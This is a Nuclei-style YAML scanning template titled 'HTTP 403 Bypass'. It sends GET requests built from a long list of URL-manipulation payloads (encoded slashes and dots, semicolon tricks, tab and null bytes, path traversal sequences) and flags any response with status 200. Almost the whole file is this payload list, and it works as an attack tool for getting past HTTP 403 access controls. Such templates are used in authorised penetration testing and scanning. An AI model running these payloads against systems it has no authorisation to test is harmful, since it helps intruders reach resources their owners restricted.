id: http-403-bypass

info:
  name: HTTP 403 Bypass
  author: ph.hitachi
  severity: medium
  description: |
    This template attempts to bypass HTTP 403 Forbidden responses using various encoding and path traversal payloads.

http:
  - raw:
      - |
        GET {{BaseURL}} HTTP/1.1
        Host: {{Hostname}}
    attack: batteringram
    payloads:
      BaseURL:
        - "{{BaseURL}}#?"
        - "{{BaseURL}}%%%%09"
        - "{{BaseURL}}%%%%09%%%%3b"
        - "{{BaseURL}}%%%%09.."
        - "{{BaseURL}}%%%%09;"
        - "{{BaseURL}}%%%%20"
        - "{{BaseURL}}%%%%23%%%%3f"
        - "{{BaseURL}}%%%%252f%%%%252f"
        - "{{BaseURL}}%%%%252f/"
        - "{{BaseURL}}%%%%2e%%%%2e"
        - "{{BaseURL}}%%%%2e%%%%2e/"
        - "{{BaseURL}}%%%%2f"
        - "{{BaseURL}}%%%%2f%%%%20%%%%23"
        - "{{BaseURL}}%%%%2f%%%%23"
        - "{{BaseURL}}%%%%2f%%%%2f"
        - "{{BaseURL}}%%%%2f%%%%3b%%%%2f"
        - "{{BaseURL}}%%%%2f%%%%3b%%%%2f%%%%2f"
        - "{{BaseURL}}%%%%2f%%%%3f"
        - "{{BaseURL}}%%%%2f%%%%3f/"
        - "{{BaseURL}}%%%%2f/"
        - "{{BaseURL}}%%%%3b"
        - "{{BaseURL}}%%%%3b%%%%09"
        - "{{BaseURL}}%%%%3b%%%%2f%%%%2e%%%%2e"
        - "{{BaseURL}}%%%%3b%%%%2f%%%%2e%%%%2e%%%%2f%%%%2e%%%%2e%%%%2f%%%%2f"
        - "{{BaseURL}}%%%%3b%%%%2f%%%%2e."
        - "{{BaseURL}}%%%%3b%%%%2f.."
        - "{{BaseURL}}%%%%3b/%%%%2e%%%%2e/..%%%%2f%%%%2f"
        - "{{BaseURL}}%%%%3b/%%%%2e."
        - "{{BaseURL}}%%%%3b/%%%%2f%%%%2f../"
        - "{{BaseURL}}%%%%3b/.."
        - "{{BaseURL}}%%%%3b//%%%%2f../"
        - "{{BaseURL}}%%%%3f%%%%23"
        - "{{BaseURL}}%%%%3f%%%%3f"
        - "{{BaseURL}}.."
        - "{{BaseURL}}..%%%%00/;"
        - "{{BaseURL}}..%%%%00;/"
        - "{{BaseURL}}..%%%%09"
        - "{{BaseURL}}..%%%%0d/;"
        - "{{BaseURL}}..%%%%0d;/"
        - "{{BaseURL}}..%%%%5c/"
        - "{{BaseURL}}..%%%%ff/;"
        - "{{BaseURL}}..%%%%ff;/"
        - "{{BaseURL}}..;%%%%00/"
        - "{{BaseURL}}..;%%%%0d/"
        - "{{BaseURL}}..;%%%%ff/"
        - "{{BaseURL}}..;\\\\\\\\\\\\\\"
        - "{{BaseURL}}..;\\;"
        - "{{BaseURL}}..\\;"
        - "{{BaseURL}}/%%%%20#"
        - "{{BaseURL}}/%%%%20%%%%23"
        - "{{BaseURL}}/%%%%252e%%%%252e%%%%252f/"
        - "{{BaseURL}}/%%%%252e%%%%252e%%%%253b/"
        - "{{BaseURL}}/%%%%252e%%%%252f/"
        - "{{BaseURL}}/%%%%252e%%%%253b/"
        - "{{BaseURL}}/%%%%252e/"
        - "{{BaseURL}}/%%%%252f"
        - "{{BaseURL}}/%%%%2e%%%%2e"
        - "{{BaseURL}}/%%%%2e%%%%2e%%%%3b/"
        - "{{BaseURL}}/%%%%2e%%%%2e/"
        - "{{BaseURL}}/%%%%2e%%%%2f/"
        - "{{BaseURL}}/%%%%2e%%%%3b/"
        - "{{BaseURL}}/%%%%2e%%%%3b//"
        - "{{BaseURL}}/%%%%2e/"
        - "{{BaseURL}}/%%%%2e//"
        - "{{BaseURL}}/%%%%2f"
        - "{{BaseURL}}/%%%%3b/"
        - "{{BaseURL}}/.."
        - "{{BaseURL}}/..%%%%2f"
        - "{{BaseURL}}/..%%%%2f..%%%%2f"
        - "{{BaseURL}}/..%%%%2f..%%%%2f..%%%%2f"
        - "{{BaseURL}}/../"
        - "{{BaseURL}}/../../"
        - "{{BaseURL}}/../../../"
        - "{{BaseURL}}/../../..//"
        - "{{BaseURL}}/../..//"
        - "{{BaseURL}}/../..//../"
        - "{{BaseURL}}/../..;/"
        - "{{BaseURL}}/.././../"
        - "{{BaseURL}}/../.;/../"
        - "{{BaseURL}}/..//"
        - "{{BaseURL}}/..//../"
        - "{{BaseURL}}/..//../../"
        - "{{BaseURL}}/..//..;/"
        - "{{BaseURL}}/../;/"
        - "{{BaseURL}}/../;/../"
        - "{{BaseURL}}/..;%%%%2f"
        - "{{BaseURL}}/..;%%%%2f..;%%%%2f"
        - "{{BaseURL}}/..;%%%%2f..;%%%%2f..;%%%%2f"
        - "{{BaseURL}}/..;/../"
        - "{{BaseURL}}/..;/..;/"
        - "{{BaseURL}}/..;//"
        - "{{BaseURL}}/..;//../"
        - "{{BaseURL}}/..;//..;/"
        - "{{BaseURL}}/..;/;/"
        - "{{BaseURL}}/..;/;/..;/"
        - "{{BaseURL}}/.//"
        - "{{BaseURL}}/.;/"
        - "{{BaseURL}}/.;//"
        - "{{BaseURL}}//.."
        - "{{BaseURL}}//../../"
        - "{{BaseURL}}//..;"
        - "{{BaseURL}}//./"
        - "{{BaseURL}}//.;/"
        - "{{BaseURL}}///.."
        - "{{BaseURL}}///../"
        - "{{BaseURL}}///..//"
        - "{{BaseURL}}///..;"
        - "{{BaseURL}}///..;/"
        - "{{BaseURL}}///..;//"
        - "{{BaseURL}}//;/"
        - "{{BaseURL}}/;/"
        - "{{BaseURL}}/;//"
        - "{{BaseURL}}/;x"
        - "{{BaseURL}}/;x/"
        - "{{BaseURL}}/x/../"
        - "{{BaseURL}}/x/..//"
        - "{{BaseURL}}/x/../;/"
        - "{{BaseURL}}/x/..;/"
        - "{{BaseURL}}/x/..;//"
        - "{{BaseURL}}/x/..;/;/"
        - "{{BaseURL}}/x//../"
        - "{{BaseURL}}/x//..;/"
        - "{{BaseURL}}/x/;/../"
        - "{{BaseURL}}/x/;/..;/"
        - "{{BaseURL}};"
        - "{{BaseURL}};%%%%09"
        - "{{BaseURL}};%%%%09.."
        - "{{BaseURL}};%%%%09..;"
        - "{{BaseURL}};%%%%09;"
        - "{{BaseURL}};%%%%2F.."
        - "{{BaseURL}};%%%%2f%%%%2e%%%%2e"
        - "{{BaseURL}};%%%%2f%%%%2e%%%%2e%%%%2f%%%%2e%%%%2e%%%%2f%%%%2f"
        - "{{BaseURL}};%%%%2f%%%%2f/../"
        - "{{BaseURL}};%%%%2f.."
        - "{{BaseURL}};%%%%2f..%%%%2f%%%%2e%%%%2e%%%%2f%%%%2f"
        - "{{BaseURL}};%%%%2f..%%%%2f..%%%%2f%%%%2f"
        - "{{BaseURL}};%%%%2f..%%%%2f/"
        - "{{BaseURL}};%%%%2f..%%%%2f/..%%%%2f"
        - "{{BaseURL}};%%%%2f..%%%%2f/../"
        - "{{BaseURL}};%%%%2f../%%%%2f..%%%%2f"
        - "{{BaseURL}};%%%%2f../%%%%2f../"
        - "{{BaseURL}};%%%%2f..//..%%%%2f"
        - "{{BaseURL}};%%%%2f..//../"
        - "{{BaseURL}};%%%%2f..///"
        - "{{BaseURL}};%%%%2f..///;"
        - "{{BaseURL}};%%%%2f..//;/"
        - "{{BaseURL}};%%%%2f..//;/;"
        - "{{BaseURL}};%%%%2f../;//"
        - "{{BaseURL}};%%%%2f../;/;/"
        - "{{BaseURL}};%%%%2f../;/;/;"
        - "{{BaseURL}};%%%%2f..;///"
        - "{{BaseURL}};%%%%2f..;//;/"
        - "{{BaseURL}};%%%%2f..;/;//"
        - "{{BaseURL}};%%%%2f/%%%%2f../"
        - "{{BaseURL}};%%%%2f//..%%%%2f"
        - "{{BaseURL}};%%%%2f//../"
        - "{{BaseURL}};%%%%2f//..;/"
        - "{{BaseURL}};%%%%2f/;/../"
        - "{{BaseURL}};%%%%2f/;/..;/"
        - "{{BaseURL}};%%%%2f;//../"
        - "{{BaseURL}};%%%%2f;/;/..;/"
        - "{{BaseURL}};/%%%%2e%%%%2e"
        - "{{BaseURL}};/%%%%2e%%%%2e%%%%2f%%%%2f"
        - "{{BaseURL}};/%%%%2e%%%%2e%%%%2f/"
        - "{{BaseURL}};/%%%%2e%%%%2e/"
        - "{{BaseURL}};/%%%%2e."
        - "{{BaseURL}};/%%%%2f%%%%2f../"
        - "{{BaseURL}};/%%%%2f/..%%%%2f"
        - "{{BaseURL}};/%%%%2f/../"
        - "{{BaseURL}};/.%%%%2e"
        - "{{BaseURL}};/.%%%%2e/%%%%2e%%%%2e/%%%%2f"
        - "{{BaseURL}};/.."
        - "{{BaseURL}};/..%%%%2f"
        - "{{BaseURL}};/..%%%%2f%%%%2f../"
        - "{{BaseURL}};/..%%%%2f..%%%%2f"
        - "{{BaseURL}};/..%%%%2f/"
        - "{{BaseURL}};/..%%%%2f//"
        - "{{BaseURL}};/../"
        - "{{BaseURL}};/../%%%%2f/"
        - "{{BaseURL}};/../../"
        - "{{BaseURL}};/../..//"
        - "{{BaseURL}};/.././../"
        - "{{BaseURL}};/../.;/../"
        - "{{BaseURL}};/..//"
        - "{{BaseURL}};/..//%%%%2e%%%%2e/"
        - "{{BaseURL}};/..//%%%%2f"
        - "{{BaseURL}};/..//../"
        - "{{BaseURL}};/..///"
        - "{{BaseURL}};/../;/"
        - "{{BaseURL}};/../;/../"
        - "{{BaseURL}};/..;"
        - "{{BaseURL}};/.;."
        - "{{BaseURL}};//%%%%2f../"
        - "{{BaseURL}};//.."
        - "{{BaseURL}};//../../"
        - "{{BaseURL}};///.."
        - "{{BaseURL}};///../"
        - "{{BaseURL}};///..//"
        - "{{BaseURL}};x"
        - "{{BaseURL}};x/"
        - "{{BaseURL}};x;"
        - "{{BaseURL}}&"
        - "{{BaseURL}}%%%%"
        - "{{BaseURL}}%%%%09"
        - "{{BaseURL}}../"
        - "{{BaseURL}}..%%%%2f"
        - "{{BaseURL}}.././"
        - "{{BaseURL}}..%%%%00/"
        - "{{BaseURL}}..%%%%0d/"
        - "{{BaseURL}}..%%%%5c"
        - "{{BaseURL}}..\\\\\\\\\\\\\\"
        - "{{BaseURL}}..%%%%ff"
        - "{{BaseURL}}%%%%2e%%%%2e%%%%2f"
        - "{{BaseURL}}.%%%%2e/"
        - "{{BaseURL}}%%%%3f"
        - "{{BaseURL}}%%%%26"
        - "{{BaseURL}}%%%%23"
        - "{{BaseURL}}%%%%2e"
        - "{{BaseURL}}/."
        - "{{BaseURL}}?"
        - "{{BaseURL}}??"
        - "{{BaseURL}}???"
        - "{{BaseURL}}//"
        - "{{BaseURL}}/./"
        - "{{BaseURL}}.//./"
        - "{{BaseURL}}//?anything"
        - "{{BaseURL}}#"
        - "{{BaseURL}}/"
        - "{{BaseURL}}/.randomstring"
        - "{{BaseURL}}..;/"
        - "{{BaseURL}}.html"
        - "{{BaseURL}}%%%%20/"
        - "{{BaseURL}}/%%%%20{{Path}}%%%%20/"
        - "{{BaseURL}}.json"
        - "{{BaseURL}}\\..\\.\\\\\\\\\\\\\\"
        - "{{BaseURL}}/*"
        - "{{BaseURL}}./."
        - "{{BaseURL}}/*/"
        - "{{BaseURL}}/..;/"
        - "{{BaseURL}}/%%%%2e/{{Path}}"
        - "{{BaseURL}}/%%%%2e/"
        - "{{BaseURL}}//."
        - "{{BaseURL}}////"
        - "{{BaseURL}}/../"
        - "{{BaseURL}}/;{{Path}}/"
    matchers-condition: or
    matchers:
      - type: status
        status:
          - 200
